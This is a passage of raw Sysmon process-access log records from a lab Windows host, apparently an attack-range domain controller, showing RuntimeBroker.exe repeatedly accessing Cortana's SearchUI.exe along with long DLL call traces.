se.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245376C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245864C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49245636C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49246036C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49244456C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.975{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\S